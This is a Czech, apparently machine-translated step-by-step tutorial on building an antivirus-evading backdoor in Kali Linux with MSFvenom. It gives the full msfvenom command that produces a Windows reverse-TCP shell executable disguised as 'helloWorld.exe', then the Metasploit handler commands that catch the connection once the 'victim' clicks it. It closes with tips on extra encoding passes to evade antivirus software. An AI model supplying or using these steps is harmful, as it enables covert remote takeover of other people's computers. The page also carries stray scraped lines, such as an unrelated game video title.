Jak vytvořit téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu

Obsah:

Jak vytvořit téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu
Jak vytvořit téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu

Video: Jak vytvořit téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu

Video: Jak vytvořit téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu
Video: Top 5 TH 8 Attack Strategies WITHOUT Clan Castle Troops (Clash of Clans) 2024, Smět
Anonim

Zadní vrátka slouží k obejití bezpečnostních mechanismů, často tajně a většinou nezjistitelně. Pomocí MSFvenom, kombinace msfpayload a msfencode, je možné vytvořit backdoor, který se připojí zpět k útočníkovi pomocí reverzního shellu TCP. Abyste si mohli vytvořit zadní vrátka, musíte změnit podpis svého malwaru, abyste se vyhnuli jakémukoli antivirovému softwaru. Dokončete tento projekt na dvojici počítačů, ke kterým máte přístup, a během toho se dozvíte více o zabezpečení počítače a o tom, jak tento druh zadních dveří funguje.

Kroky

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux Krok 1
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux Krok 1

Krok 1. Spusťte Kali a spusťte Terminálovou konzolu

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux Krok 2
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux Krok 2

Krok 2. Zadejte ifconfig pro zobrazení rozhraní a zkontrolujte vaši IP adresu

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu Krok 3
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu Krok 3

Krok 3. Seznam kodérů zobrazíte zadáním kodérů msfvenom -l

Jako kodér použijete x86/shikata_ga_nai

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux Krok 4
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux Krok 4

Krok 4. Zadejte „msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe

  • -a x86 --platform windows označuje architekturu, kterou má použít.
  • -p windows/shell/reverse_tcp určuje užitečné zatížení, které má být vloženo.
  • LHOST označuje IP adresu posluchače.
  • LPORT označuje port posluchače.
  • -b "\ x00" označuje, aby se zabránilo špatnému znaku (null bajtů).
  • -e x86/shikata_ga_nai určuje název kodérů.
  • -f exe> helloWorld.exe určuje výstup formátu.
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu Krok 5
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu Krok 5

Krok 5. Aktivujte Metasploit zadáním msfconsole

Nyní jste si vygenerovali zadní vrátka. Když oběť klikne na helloWorld.exe, aktivuje se vložené užitečné zatížení prostředí a vytvoří připojení zpět k vašemu systému. Abyste mohli získat připojení, musíte otevřít více-handler v Metasploitu a nastavit užitečné zatížení

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu Krok 6
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linuxu Krok 6

Krok 6. Napište use exploit/multi/handler

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 7
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 7

Krok 7. Zadejte příkaz set payload windows/shell/reverse_tcp

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 8
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 8

Krok 8. Chcete -li modul zkontrolovat, zadejte příkaz show options

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 9
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 9

Krok 9. Zadejte sadu LHOST 192.168.48.129

„LHOST“označuje IP adresu posluchače

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 10
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 10

Krok 10. Zadejte sadu LPORT 4444

„LPORT“označuje port posluchače

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 11
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 11

Krok 11. Zadejte příkaz run a počkejte na připojení z počítače oběti

Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 12
Vytvořte téměř nezjistitelné zadní vrátka pomocí MSFvenom v Kali Linux, krok 12

Krok 12. Počkejte, až oběť klikne na helloWorld.exe

Poté budete úspěšně připojeni ke stroji oběti.

Tipy

  • Použití -i v MSFvenom bude představovat iterace kódování. Někdy může k obejití AV softwaru pomoci více iterací.
  • Naučili jste se generovat zadní vrátka a kódovat je pomocí MSFvenom, ale tato metoda v dnešní době nebude fungovat dokonale proti některému AV softwaru. Důvodem je to, že šablony spouštění v MSFvenom. Dodavatelé AV přidali statický podpis těchto šablon a jen je hledali. Řešením tohoto problému je použít jinou šablonu spuštění nebo jiné nástroje.

Doporučuje: